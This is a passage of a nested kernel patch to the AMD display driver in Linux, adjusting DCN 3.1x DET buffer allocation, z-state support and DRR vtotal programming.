+@@ -127,6 +131,7 @@ union stream_update_flags {
+ 		uint32_t dsc_changed : 1;
+ 		uint32_t mst_bw : 1;
+ 		uint32_t crtc_timing_adjust : 1;
++		uint32_t fams_changed : 1;
+ 	} bits;
+ 
+ 	uint32_t raw;
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_hwseq.c b/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_hwseq.c
+index 622efa556e7ad..4ef632864948e 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_hwseq.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_hwseq.c
+@@ -2036,7 +2036,7 @@ void dcn20_optimize_bandwidth(
+ 			dc->clk_mgr,
+ 			context,
+ 			true);
+-	if (dc_extended_blank_supported(dc) && context->bw_ctx.bw.dcn.clk.zstate_support == DCN_ZSTATE_SUPPORT_ALLOW) {
++	if (context->bw_ctx.bw.dcn.clk.zstate_support == DCN_ZSTATE_SUPPORT_ALLOW) {
+ 		for (i = 0; i < dc->res_pool->pipe_count; ++i) {
+ 			struct pipe_ctx *pipe_ctx = &context->res_ctx.pipe_ctx[i];
+ 
+@@ -2044,7 +2044,7 @@ void dcn20_optimize_bandwidth(
+ 				&& pipe_ctx->stream->adjust.v_total_min == pipe_ctx->stream->adjust.v_total_max
+ 				&& pipe_ctx->stream->adjust.v_total_max > pipe_ctx->stream->timing.v_total)
+ 					pipe_ctx->plane_res.hubp->funcs->program_extended_blank(pipe_ctx->plane_res.hubp,
+-						pipe_ctx->dlg_regs.optimized_min_dst_y_next_start);
++						pipe_ctx->dlg_regs.min_dst_y_next_start);
+ 		}
+ 	}
+ }
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_optc.c b/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_optc.c
+index 25749f7d88366..94894fd6c9062 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_optc.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_optc.c
+@@ -292,7 +292,12 @@ void optc3_wait_drr_doublebuffer_pending_clear(struct timing_generator *optc)
+ 
+ void optc3_set_vtotal_min_max(struct timing_generator *optc, int vtotal_min, int vtotal_max)
+ {
+-	optc1_set_vtotal_min_max(optc, vtotal_min, vtotal_max);
++	struct dc *dc = optc->ctx->dc;
++
++	if (dc->caps.dmub_caps.mclk_sw && !dc->debug.disable_fams)
++		dc_dmub_srv_drr_update_cmd(dc, optc->inst, vtotal_min, vtotal_max);
++	else
++		optc1_set_vtotal_min_max(optc, vtotal_min, vtotal_max);
+ }
+ 
+ void optc3_tg_init(struct timing_generator *optc)
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_hubbub.c b/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_hubbub.c
+index 6360dc9502e70..0f231e42e4206 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_hubbub.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_hubbub.c
+@@ -103,6 +103,7 @@ static void dcn31_program_det_size(struct hubbub *hubbub, int hubp_inst, unsigne
+ 	default:
+ 		break;
+ 	}
++	DC_LOG_DEBUG("Set DET%d to %d segments\n", hubp_inst, det_size_segments);
+ 	/* Should never be hit, if it is we have an erroneous hw config*/
+ 	ASSERT(hubbub2->det0_size + hubbub2->det1_size + hubbub2->det2_size
+ 			+ hubbub2->det3_size + hubbub2->compbuf_size_segments <= hubbub2->crb_size_segs);
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn315/dcn315_resource.c b/drivers/gpu/drm/amd/display/dc/dcn315/dcn315_resource.c
+index 31cbc5762eab3..b9b1e5ac4f538 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn315/dcn315_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn315/dcn315_resource.c
+@@ -136,6 +136,9 @@
+ 
+ #define DCN3_15_MAX_DET_SIZE 384
+ #define DCN3_15_CRB_SEGMENT_SIZE_KB 64
++#define DCN3_15_MAX_DET_SEGS (DCN3_15_MAX_DET_SIZE / DCN3_15_CRB_SEGMENT_SIZE_KB)
++/* Minimum 2 extra segments need to be in compbuf and claimable to guarantee seamless mpo transitions */
++#define MIN_RESERVED_DET_SEGS 2
+ 
+ enum dcn31_clk_src_array_id {
+ 	DCN31_CLK_SRC_PLL0,
+@@ -1636,21 +1639,61 @@ static bool is_dual_plane(enum surface_pixel_format format)
+ 	return format >= SURFACE_PIXEL_FORMAT_VIDEO_BEGIN || format == SURFACE_PIXEL_FORMAT_GRPH_RGBE_ALPHA;
+ }
+ 
++static int source_format_to_bpp (enum source_format_class SourcePixelFormat)
++{
++	if (SourcePixelFormat == dm_444_64)
++		return 8;
++	else if (SourcePixelFormat == dm_444_16 || SourcePixelFormat == dm_444_16)
++		return 2;
++	else if (SourcePixelFormat == dm_444_8)
++		return 1;
++	else if (SourcePixelFormat == dm_rgbe_alpha)
++		return 5;
++	else if (SourcePixelFormat == dm_420_8)
++		return 3;
++	else if (SourcePixelFormat == dm_420_12)
++		return 6;
++	else
++		return 4;
++}
++
++static bool allow_pixel_rate_crb(struct dc *dc, struct dc_state *context)
++{
++	int i;
++	struct resource_context *res_ctx = &context->res_ctx;
++
++	/*Don't apply for single stream*/
++	if (context->stream_count < 2)
++		return false;
++
++	for (i = 0; i < dc->res_pool->pipe_count; i++) {
++		if (!res_ctx->pipe_ctx[i].stream)
++			continue;
++
++		/*Don't apply if MPO to avoid transition issues*/
++		if (res_ctx->pipe_ctx[i].top_pipe && res_ctx->pipe_ctx[i].top_pipe->plane_state != res_ctx->pipe_ctx[i].plane_state)
++			return false;
++	}
++	return true;
++}
++
+ static int dcn315_populate_dml_pipes_from_context(
+ 	struct dc *dc, struct dc_state *context,
+ 	display_e2e_pipe_params_st *pipes,
+ 	bool fast_validate)
+ {
+-	int i, pipe_cnt;
++	int i, pipe_cnt, crb_idx, crb_pipes;
+ 	struct resource_context *res_ctx = &context->res_ctx;
+ 	struct pipe_ctx *pipe;
+ 	const int max_usable_det = context->bw_ctx.dml.ip.config_return_buffer_size_in_kbytes - DCN3_15_MIN_COMPBUF_SIZE_KB;
++	int remaining_det_segs = max_usable_det / DCN3_15_CRB_SEGMENT_SIZE_KB;
++	bool pixel_rate_crb = allow_pixel_rate_crb(dc, context);
+ 
+ 	DC_FP_START();
+ 	dcn20_populate_dml_pipes_from_context(dc, context, pipes, fast_validate);
+ 	DC_FP_END();
+ 
+-	for (i = 0, pipe_cnt = 0; i < dc->res_pool->pipe_count; i++) {
++	for (i = 0, pipe_cnt = 0, crb_pipes = 0; i < dc->res_pool->pipe_count; i++) {
+ 		struct dc_crtc_timing *timing;
+ 
+ 		if (!res_ctx->pipe_ctx[i].stream)
+@@ -1672,6 +1715,23 @@ static int dcn315_populate_dml_pipes_from_context(
+ 		pipes[pipe_cnt].dout.dsc_input_bpc = 0;
+ 		DC_FP_START();
+ 		dcn31_zero_pipe_dcc_fraction(pipes, pipe_cnt);
++		if (pixel_rate_crb && !pipe->top_pipe && !pipe->prev_odm_pipe) {
++			int bpp = source_format_to_bpp(pipes[pipe_cnt].pipe.src.source_format);
++			/* Ceil to crb segment size */
++			int approx_det_segs_required_for_pstate = dcn_get_approx_det_segs_required_for_pstate(
++					&context->bw_ctx.dml.soc, timing->pix_clk_100hz, bpp, DCN3_15_CRB_SEGMENT_SIZE_KB);
++			if (approx_det_segs_required_for_pstate <= 2 * DCN3_15_MAX_DET_SEGS) {
++				bool split_required = approx_det_segs_required_for_pstate > DCN3_15_MAX_DET_SEGS;
++				split_required = split_required || timing->pix_clk_100hz >= dcn_get_max_non_odm_pix_rate_100hz(&dc->dml.soc);
++				split_required = split_required || (pipe->plane_state && pipe->plane_state->src_rect.width > 5120);
++				if (split_required)
++					approx_det_segs_required_for_pstate += approx_det_segs_required_for_pstate % 2;
++				pipes[pipe_cnt].pipe.src.det_size_override = approx_det_segs_required_for_pstate;
++				remaining_det_segs -= approx_det_segs_required_for_pstate;
++			} else
++				remaining_det_segs = -1;
++			crb_pipes++;
++		}
+ 		DC_FP_END();
+ 
+ 		if (pipes[pipe_cnt].dout.dsc_enable) {
+@@ -1690,16 +1750,54 @@ static int dcn315_populate_dml_pipes_from_context(
+ 				break;
+ 			}
+ 		}
+-
+ 		pipe_cnt++;
+ 	}
+ 
++	/* Spread remaining unreserved crb evenly among all pipes*/
++	if (pixel_rate_crb) {
++		for (i = 0, pipe_cnt = 0, crb_idx = 0; i < dc->res_pool->pipe_count; i++) {
++			pipe = &res_ctx->pipe_ctx[i];
++			if (!pipe->stream)
++				continue;
++
++			/* Do not use asymetric crb if not enough for pstate support */
++			if (remaining_det_segs < 0) {
++				pipes[pipe_cnt].pipe.src.det_size_override = 0;
++				continue;
++			}
++
++			if (!pipe->top_pipe && !pipe->prev_odm_pipe) {
++				bool split_required = pipe->stream->timing.pix_clk_100hz >= dcn_get_max_non_odm_pix_rate_100hz(&dc->dml.soc)
++						|| (pipe->plane_state && pipe->plane_state->src_rect.width > 5120);
++
++				if (remaining_det_segs > MIN_RESERVED_DET_SEGS)
++					pipes[pipe_cnt].pipe.src.det_size_override += (remaining_det_segs - MIN_RESERVED_DET_SEGS) / crb_pipes +
++							(crb_idx < (remaining_det_segs - MIN_RESERVED_DET_SEGS) % crb_pipes ? 1 : 0);
++				if (pipes[pipe_cnt].pipe.src.det_size_override > 2 * DCN3_15_MAX_DET_SEGS) {
++					/* Clamp to 2 pipe split max det segments */
++					remaining_det_segs += pipes[pipe_cnt].pipe.src.det_size_override - 2 * (DCN3_15_MAX_DET_SEGS);
++					pipes[pipe_cnt].pipe.src.det_size_override = 2 * DCN3_15_MAX_DET_SEGS;
++				}
++				if (pipes[pipe_cnt].pipe.src.det_size_override > DCN3_15_MAX_DET_SEGS || split_required) {
++					/* If we are splitting we must have an even number of segments */
++					remaining_det_segs += pipes[pipe_cnt].pipe.src.det_size_override % 2;
++					pipes[pipe_cnt].pipe.src.det_size_override -= pipes[pipe_cnt].pipe.src.det_size_override % 2;
++				}
++				/* Convert segments into size for DML use */
++				pipes[pipe_cnt].pipe.src.det_size_override *= DCN3_15_CRB_SEGMENT_SIZE_KB;
++
++				crb_idx++;
++			}
++			pipe_cnt++;
++		}
++	}
++
+ 	if (pipe_cnt)
+ 		context->bw_ctx.dml.ip.det_buffer_size_kbytes =
+ 				(max_usable_det / DCN3_15_CRB_SEGMENT_SIZE_KB / pipe_cnt) * DCN3_15_CRB_SEGMENT_SIZE_KB;
+ 	if (context->bw_ctx.dml.ip.det_buffer_size_kbytes > DCN3_15_MAX_DET_SIZE)
+ 		context->bw_ctx.dml.ip.det_buffer_size_kbytes = DCN3_15_MAX_DET_SIZE;
+-	ASSERT(context->bw_ctx.dml.ip.det_buffer_size_kbytes >= DCN3_15_DEFAULT_DET_SIZE);
++
+ 	dc->config.enable_4to1MPC = false;
+ 	if (pipe_cnt == 1 && pipe->plane_state && !dc->debug.disable_z9_mpc) {
+ 		if (is_dual_plane(pipe->plane_state->format)
+@@ -1707,7 +1805,9 @@ static int dcn315_populate_dml_pipes_from_context(
+ 			dc->config.enable_4to1MPC = true;
+ 			context->bw_ctx.dml.ip.det_buffer_size_kbytes =
+ 					(max_usable_det / DCN3_15_CRB_SEGMENT_SIZE_KB / 4) * DCN3_15_CRB_SEGMENT_SIZE_KB;
+-		} else if (!is_dual_plane(pipe->plane_state->format) && pipe->plane_state->src_rect.width <= 5120) {
++		} else if (!is_dual_plane(pipe->plane_state->format)
++				&& pipe->plane_state->src_rect.width <= 5120
++				&& pipe->stream->timing.pix_clk_100hz < dcn_get_max_non_odm_pix_rate_100hz(&dc->dml.soc)) {
+ 			/* Limit to 5k max to avoid forced pipe split when there is not enough detile for swath */
+ 			context->bw_ctx.dml.ip.det_buffer_size_kbytes = 192;
+ 			pipes[0].pipe.src.unbounded_req_mode = true;
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn20/dcn20_fpu.c b/drivers/gpu/drm/amd/display/dc/dml/dcn20/dcn20_fpu.c
+index 186538e3e3c0c..dbe5d2efa4a30 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn20/dcn20_fpu.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn20/dcn20_fpu.c
+@@ -948,10 +948,10 @@ static enum dcn_zstate_support_state  decide_zstate_support(struct dc *dc, struc
+ {
+ 	int plane_count;
+ 	int i;
+-	unsigned int optimized_min_dst_y_next_start_us;
++	unsigned int min_dst_y_next_start_us;
+ 
+ 	plane_count = 0;
+-	optimized_min_dst_y_next_start_us = 0;
++	min_dst_y_next_start_us = 0;
+ 	for (i = 0; i < dc->res_pool->pipe_count; i++) {
+ 		if (context->res_ctx.pipe_ctx[i].plane_state)
+ 			plane_count++;
+@@ -973,19 +973,18 @@ static enum dcn_zstate_support_state  decide_zstate_support(struct dc *dc, struc
+ 	else if (context->stream_count == 1 &&  context->streams[0]->signal == SIGNAL_TYPE_EDP) {
+ 		struct dc_link *link = context->streams[0]->sink->link;
+ 		struct dc_stream_status *stream_status = &context->stream_status[0];
++		struct dc_stream_state *current_stream = context->streams[0];
+ 		int minmum_z8_residency = dc->debug.minimum_z8_residency_time > 0 ? dc->debug.minimum_z8_residency_time : 1000;
+ 		bool allow_z8 = context->bw_ctx.dml.vba.StutterPeriod > (double)minmum_z8_residency;
+ 		bool is_pwrseq0 = link->link_index == 0;
++		bool isFreesyncVideo;
+ 
+-		if (dc_extended_blank_supported(dc)) {
+-			for (i = 0; i < dc->res_pool->pipe_count; i++) {
+-				if (context->res_ctx.pipe_ctx[i].stream == context->streams[0]
+-					&& context->res_ctx.pipe_ctx[i].stream->adjust.v_total_min == context->res_ctx.pipe_ctx[i].stream->adjust.v_total_max
+-					&& context->res_ctx.pipe_ctx[i].stream->adjust.v_total_min > context->res_ctx.pipe_ctx[i].stream->timing.v_total) {
+-						optimized_min_dst_y_next_start_us =
+-							context->res_ctx.pipe_ctx[i].dlg_regs.optimized_min_dst_y_next_start_us;
+-						break;
+-				}
++		isFreesyncVideo = current_stream->adjust.v_total_min == current_stream->adjust.v_total_max;
++		isFreesyncVideo = isFreesyncVideo && current_stream->timing.v_total < current_stream->adjust.v_total_min;
++		for (i = 0; i < dc->res_pool->pipe_count; i++) {
++			if (context->res_ctx.pipe_ctx[i].stream == current_stream && isFreesyncVideo) {
++				min_dst_y_next_start_us = context->res_ctx.pipe_ctx[i].dlg_regs.min_dst_y_next_start_us;
++				break;
+ 			}
+ 		}
+ 
+@@ -993,7 +992,7 @@ static enum dcn_zstate_support_state  decide_zstate_support(struct dc *dc, struc
+ 		if (stream_status->plane_count > 1)
+ 			return DCN_ZSTATE_SUPPORT_DISALLOW;
+ 
+-		if (is_pwrseq0 && (context->bw_ctx.dml.vba.StutterPeriod > 5000.0 || optimized_min_dst_y_next_start_us > 5000))
++		if (is_pwrseq0 && (context->bw_ctx.dml.vba.StutterPeriod > 5000.0 || min_dst_y_next_start_us > 5000))
+ 			return DCN_ZSTATE_SUPPORT_ALLOW;
+ 		else if (is_pwrseq0 && link->psr_settings.psr_version == DC_PSR_VERSION_1 && !link->panel_config.psr.disable_psr)
+ 			return allow_z8 ? DCN_ZSTATE_SUPPORT_ALLOW_Z8_Z10_ONLY : DCN_ZSTATE_SUPPORT_ALLOW_Z10_ONLY;
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn31/dcn31_fpu.c b/drivers/gpu/drm/amd/display/dc/dml/dcn31/dcn31_fpu.c
+index 8e416433184cf..19d034341e640 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn31/dcn31_fpu.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn31/dcn31_fpu.c
+@@ -483,7 +483,7 @@ void dcn31_calculate_wm_and_dlg_fp(
+ 		int pipe_cnt,
+ 		int vlevel)
+ {
+-	int i, pipe_idx, active_dpp_count = 0;
++	int i, pipe_idx, total_det = 0, active_hubp_count = 0;
+ 	double dcfclk = context->bw_ctx.dml.vba.DCFCLKState[vlevel][context->bw_ctx.dml.vba.maxMpcComb];
+ 
+ 	dc_assert_fp_enabled();
+@@ -529,7 +529,7 @@ void dcn31_calculate_wm_and_dlg_fp(
+ 			continue;
+ 
+ 		if (context->res_ctx.pipe_ctx[i].plane_state)
+-			active_dpp_count++;
++			active_hubp_count++;
+ 
+ 		pipes[pipe_idx].clks_cfg.dispclk_mhz = get_dispclk_calculated(&context->bw_ctx.dml, pipes, pipe_cnt);
+ 		pipes[pipe_idx].clks_cfg.dppclk_mhz = get_dppclk_calculated(&context->bw_ctx.dml, pipes, pipe_cnt, pipe_idx);
+@@ -547,9 +547,34 @@ void dcn31_calculate_wm_and_dlg_fp(
+ 	}
+ 
+ 	dcn20_calculate_dlg_params(dc, context, pipes, pipe_cnt, vlevel);
+-	/* For 31x apu pstate change is only supported if possible in vactive or if there are no active dpps */
++	/* For 31x apu pstate change is only supported if possible in vactive*/
+ 	context->bw_ctx.bw.dcn.clk.p_state_change_support =
+-			context->bw_ctx.dml.vba.DRAMClockChangeSupport[vlevel][context->bw_ctx.dml.vba.maxMpcComb] == dm_dram_clock_change_vactive || !active_dpp_count;
++			context->bw_ctx.dml.vba.DRAMClockChangeSupport[vlevel][context->bw_ctx.dml.vba.maxMpcComb] == dm_dram_clock_change_vactive;
++	/* If DCN isn't making memory requests we can allow pstate change and lower clocks */
++	if (!active_hubp_count) {
++		context->bw_ctx.bw.dcn.clk.socclk_khz = 0;
++		context->bw_ctx.bw.dcn.clk.dppclk_khz = 0;
++		context->bw_ctx.bw.dcn.clk.dcfclk_khz = 0;
++		context->bw_ctx.bw.dcn.clk.dcfclk_deep_sleep_khz = 0;
++		context->bw_ctx.bw.dcn.clk.dramclk_khz = 0;
++		context->bw_ctx.bw.dcn.clk.fclk_khz = 0;
++		context->bw_ctx.bw.dcn.clk.p_state_change_support = true;
++		for (i = 0; i < dc->res_pool->pipe_count; i++)
++			if (context->res_ctx.pipe_ctx[i].stream)
++				context->res_ctx.pipe_ctx[i].plane_res.bw.dppclk_khz = 0;
++	}
++	for (i = 0, pipe_idx = 0; i < dc->res_pool->pipe_count; i++) {
++		if (!context->res_ctx.pipe_ctx[i].stream)
++			continue;
++
++		context->res_ctx.pipe_ctx[i].det_buffer_size_kb =
++				get_det_buffer_size_kbytes(&context->bw_ctx.dml, pipes, pipe_cnt, pipe_idx);
++		if (context->res_ctx.pipe_ctx[i].det_buffer_size_kb > 384)
++			context->res_ctx.pipe_ctx[i].det_buffer_size_kb /= 2;
++		total_det += context->res_ctx.pipe_ctx[i].det_buffer_size_kb;
++		pipe_idx++;
++	}
++	context->bw_ctx.bw.dcn.compbuf_size_kb = context->bw_ctx.dml.ip.config_return_buffer_size_in_kbytes - total_det;
+ }
+ 
+ void dcn31_update_bw_bounding_box(struct dc *dc, struct clk_bw_params *bw_params)
+@@ -797,3 +822,19 @@ void dcn316_update_bw_bounding_box(struct dc *dc, struct clk_bw_params *bw_param
+ 	else
+ 		dml_init_instance(&dc->dml, &dcn3_16_soc, &dcn3_16_ip, DML_PROJECT_DCN31_FPGA);
+ }
++
++int dcn_get_max_non_odm_pix_rate_100hz(struct _vcs_dpi_soc_bounding_box_st *soc)
++{
++	return soc->clock_limits[0].dispclk_mhz * 10000.0 / (1.0 + soc->dcn_downspread_percent / 100.0);
++}
++
++int dcn_get_approx_det_segs_required_for_pstate(
++		struct _vcs_dpi_soc_bounding_box_st *soc,
++		int pix_clk_100hz, int bpp, int seg_size_kb)
++{
++	/* Roughly calculate required crb to hide latency. In practice there is slightly
++	 * more buffer available for latency hiding
++	 */
++	return (int)(soc->dram_clock_change_latency_us * pix_clk_100hz * bpp
++					/ 10240000 + seg_size_kb - 1) /	seg_size_kb;
++}
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn31/dcn31_fpu.h b/drivers/gpu/drm/amd/display/dc/dml/dcn31/dcn31_fpu.h
+index fd58b2561ec9e..99518f64d83dd 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn31/dcn31_fpu.h
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn31/dcn31_fpu.h
+@@ -46,5 +46,9 @@ void dcn31_calculate_wm_and_dlg_fp(
+ void dcn31_update_bw_bounding_box(struct dc *dc, struct clk_bw_params *bw_params);
+ void dcn315_update_bw_bounding_box(struct dc *dc, struct clk_bw_params *bw_params);
+ void dcn316_update_bw_bounding_box(struct dc *dc, struct clk_bw_params *bw_params);
++int dcn_get_max_non_odm_pix_rate_100hz(struct _vcs_dpi_soc_bounding_box_st *soc);
++int dcn_get_approx_det_segs_required_for_pstate(
++		struct _vcs_dpi_soc_bounding_box_st *soc,
++		int pix_clk_100hz, int bpp, int seg_size_kb);
+ 
+ #endif /* __DCN31_FPU_H__*/
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn31/display_mode_vba_31.c b/drivers/gpu/drm/amd/display/dc/dml/dcn31/display_mode_vba_31.c
+index cf8f3d690fa66..ebc04b72b284b 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn31/display_mode_vba_31.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn31/display_mode_vba_31.c
+@@ -533,7 +533,8 @@ static void CalculateStutterEfficiency(
+ static void CalculateSwathAndDETConfiguration(
+ 		bool ForceSingleDPP,
+ 		int NumberOfActivePlanes,
+-		unsigned int DETBufferSizeInKByte,
++		bool DETSharedByAllDPP,
++		unsigned int DETBufferSizeInKByte[],
+ 		double MaximumSwathWidthLuma[],
+ 		double MaximumSwathWidthChroma[],
+ 		enum scan_direction_class SourceScan[],
+@@ -3116,7 +3117,7 @@ static void DISPCLKDPPCLKDCFCLKDeepSleepPrefetchParametersWatermarksAndPerforman
+ 				v->SurfaceWidthC[k],
+ 				v->SurfaceHeightY[k],
+ 				v->SurfaceHeightC[k],
+-				v->DETBufferSizeInKByte[0] * 1024,
++				v->DETBufferSizeInKByte[k] * 1024,
+ 				v->BlockHeight256BytesY[k],
+ 				v->BlockHeight256BytesC[k],
+ 				v->SurfaceTiling[k],
+@@ -3311,7 +3312,8 @@ static void DisplayPipeConfiguration(struct display_mode_lib *mode_lib)
+ 	CalculateSwathAndDETConfiguration(
+ 			false,
+ 			v->NumberOfActivePlanes,
+-			v->DETBufferSizeInKByte[0],
++			mode_lib->project == DML_PROJECT_DCN315 && v->DETSizeOverride[0],
++			v->DETBufferSizeInKByte,
+ 			dummy1,
+ 			dummy2,
+ 			v->SourceScan,
+@@ -3777,14 +3779,16 @@ static noinline void CalculatePrefetchSchedulePerPlane(
+ 		&v->VReadyOffsetPix[k]);
+ }
+ 
+-static void PatchDETBufferSizeInKByte(unsigned int NumberOfActivePlanes, int NoOfDPPThisState[], unsigned int config_return_buffer_size_in_kbytes, unsigned int *DETBufferSizeInKByte)
++static void PatchDETBufferSizeInKByte(unsigned int NumberOfActivePlanes, int NoOfDPPThisState[], unsigned int config_return_buffer_size_in_kbytes, unsigned int DETBufferSizeInKByte[])
+ {
+ 	int i, total_pipes = 0;
+ 	for (i = 0; i < NumberOfActivePlanes; i++)
+ 		total_pipes += NoOfDPPThisState[i];
+-	*DETBufferSizeInKByte = ((config_return_buffer_size_in_kbytes - DCN3_15_MIN_COMPBUF_SIZE_KB) / 64 / total_pipes) * 64;
+-	if (*DETBufferSizeInKByte > DCN3_15_MAX_DET_SIZE)
+-		*DETBufferSizeInKByte = DCN3_15_MAX_DET_SIZE;
++	DETBufferSizeInKByte[0] = ((config_return_buffer_size_in_kbytes - DCN3_15_MIN_COMPBUF_SIZE_KB) / 64 / total_pipes) * 64;
++	if (DETBufferSizeInKByte[0] > DCN3_15_MAX_DET_SIZE)
++		DETBufferSizeInKByte[0] = DCN3_15_MAX_DET_SIZE;
++	for (i = 1; i < NumberOfActivePlanes; i++)
++		DETBufferSizeInKByte[i] = DETBufferSizeInKByte[0];
+ }
+ 
+ 
+@@ -4024,7 +4028,8 @@ void dml31_ModeSupportAndSystemConfigurationFull(struct display_mode_lib *mode_l
+ 	CalculateSwathAndDETConfiguration(
+ 			true,
+ 			v->NumberOfActivePlanes,
+-			v->DETBufferSizeInKByte[0],
++			mode_lib->project == DML_PROJECT_DCN315 && v->DETSizeOverride[0],
++			v->DETBufferSizeInKByte,
+ 			v->MaximumSwathWidthLuma,
+ 			v->MaximumSwathWidthChroma,
+ 			v->SourceScan,
+@@ -4164,6 +4169,10 @@ void dml31_ModeSupportAndSystemConfigurationFull(struct display_mode_lib *mode_l
+ 						|| (v->PlaneRequiredDISPCLK > v->MaxDispclkRoundedDownToDFSGranularity)) {
+ 					v->DISPCLK_DPPCLK_Support[i][j] = false;
+ 				}
++				if (mode_lib->project == DML_PROJECT_DCN315 && v->DETSizeOverride[k] > DCN3_15_MAX_DET_SIZE && v->NoOfDPP[i][j][k] < 2) {
++					v->MPCCombine[i][j][k] = true;
++					v->NoOfDPP[i][j][k] = 2;
++				}
+ 			}
+ 			v->TotalNumberOfActiveDPP[i][j] = 0;
+ 			v->TotalNumberOfSingleDPPPlanes[i][j] = 0;
+@@ -4640,12 +4649,13 @@ void dml31_ModeSupportAndSystemConfigurationFull(struct display_mode_lib *mode_l
+ 				v->ODMCombineEnableThisState[k] = v->ODMCombineEnablePerState[i][k];
+ 			}
+ 
+-			if (v->NumberOfActivePlanes > 1 && mode_lib->project == DML_PROJECT_DCN315)
+-				PatchDETBufferSizeInKByte(v->NumberOfActivePlanes, v->NoOfDPPThisState, v->ip.config_return_buffer_size_in_kbytes, &v->DETBufferSizeInKByte[0]);
++			if (v->NumberOfActivePlanes > 1 && mode_lib->project == DML_PROJECT_DCN315 && !v->DETSizeOverride[0])
++				PatchDETBufferSizeInKByte(v->NumberOfActivePlanes, v->NoOfDPPThisState, v->ip.config_return_buffer_size_in_kbytes, v->DETBufferSizeInKByte);
+ 			CalculateSwathAndDETConfiguration(
+ 					false,
+ 					v->NumberOfActivePlanes,
+-					v->DETBufferSizeInKByte[0],
++					mode_lib->project == DML_PROJECT_DCN315 && v->DETSizeOverride[0],
++					v->DETBufferSizeInKByte,
+ 					v->MaximumSwathWidthLuma,
+ 					v->MaximumSwathWidthChroma,
+ 					v->SourceScan,
+@@ -6557,7 +6567,8 @@ static void CalculateStutterEfficiency(
+ static void CalculateSwathAndDETConfiguration(
+ 		bool ForceSingleDPP,
+ 		int NumberOfActivePlanes,
+-		unsigned int DETBufferSizeInKByte,
++		bool DETSharedByAllDPP,
++		unsigned int DETBufferSizeInKByteA[],
+ 		double MaximumSwathWidthLuma[],
+ 		double MaximumSwathWidthChroma[],
+ 		enum scan_direction_class SourceScan[],
+@@ -6641,6 +6652,10 @@ static void CalculateSwathAndDETConfiguration(
+ 
+ 	*ViewportSizeSupport = true;
+ 	for (k = 0; k < NumberOfActivePlanes; ++k) {
++		unsigned int DETBufferSizeInKByte = DETBufferSizeInKByteA[k];
++
++		if (DETSharedByAllDPP && DPPPerPlane[k])
++			DETBufferSizeInKByte /= DPPPerPlane[k];
+ 		if ((SourcePixelFormat[k] == dm_444_64 || SourcePixelFormat[k] == dm_444_32 || SourcePixelFormat[k] == dm_444_16 || SourcePixelFormat[k] == dm_mono_16
+ 				|| SourcePixelFormat[k] == dm_mono_8 || SourcePixelFormat[k] == dm_rgbe)) {
+ 			if (SurfaceTiling[k] == dm_sw_linear
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn31/display_rq_dlg_calc_31.c b/drivers/gpu/drm/amd/display/dc/dml/dcn31/display_rq_dlg_calc_31.c
+index 35d10b4d018bf..d7ee26b62a5eb 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn31/display_rq_dlg_calc_31.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn31/display_rq_dlg_calc_31.c
+@@ -988,8 +988,7 @@ static void dml_rq_dlg_get_dlg_params(
+ 
+ 	dlg_vblank_start = interlaced ? (vblank_start / 2) : vblank_start;
+ 	disp_dlg_regs->min_dst_y_next_start = (unsigned int) (((double) dlg_vblank_start) * dml_pow(2, 2));
+-	disp_dlg_regs->optimized_min_dst_y_next_start_us = 0;
+-	disp_dlg_regs->optimized_min_dst_y_next_start = disp_dlg_regs->min_dst_y_next_start;
++	disp_dlg_regs->min_dst_y_next_start_us = 0;
+ 	ASSERT(disp_dlg_regs->min_dst_y_next_start < (unsigned int)dml_pow(2, 18));
+ 
+ 	dml_print("DML_DLG: %s: min_ttu_vblank (us)         = %3.2f\n", __func__, min_ttu_vblank);
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn314/dcn314_fpu.c b/drivers/gpu/drm/amd/display/dc/dml/dcn314/dcn314_fpu.c
+index bf77e56c3f3ef..8a88605827a84 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn314/dcn314_fpu.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn314/dcn314_fpu.c
+@@ -32,7 +32,7 @@
+ #include "dml/display_mode_vba.h"
+ 
+ struct _vcs_dpi_ip_params_st dcn3_14_ip = {
+-	.VBlankNomDefaultUS = 668,
++	.VBlankNomDefaultUS = 800,
+ 	.gpuvm_enable = 1,
+ 	.gpuvm_max_page_table_levels = 1,
+ 	.hostvm_enable = 1,
+@@ -288,6 +288,7 @@ int dcn314_populate_dml_pipes_from_context_fpu(struct dc *dc, struct dc_state *c
+ 	struct resource_context *res_ctx = &context->res_ctx;
+ 	struct pipe_ctx *pipe;
+ 	bool upscaled = false;
++	const unsigned int max_allowed_vblank_nom = 1023;
+ 
+ 	dc_assert_fp_enabled();
+ 
+@@ -301,9 +302,15 @@ int dcn314_populate_dml_pipes_from_context_fpu(struct dc *dc, struct dc_state *c
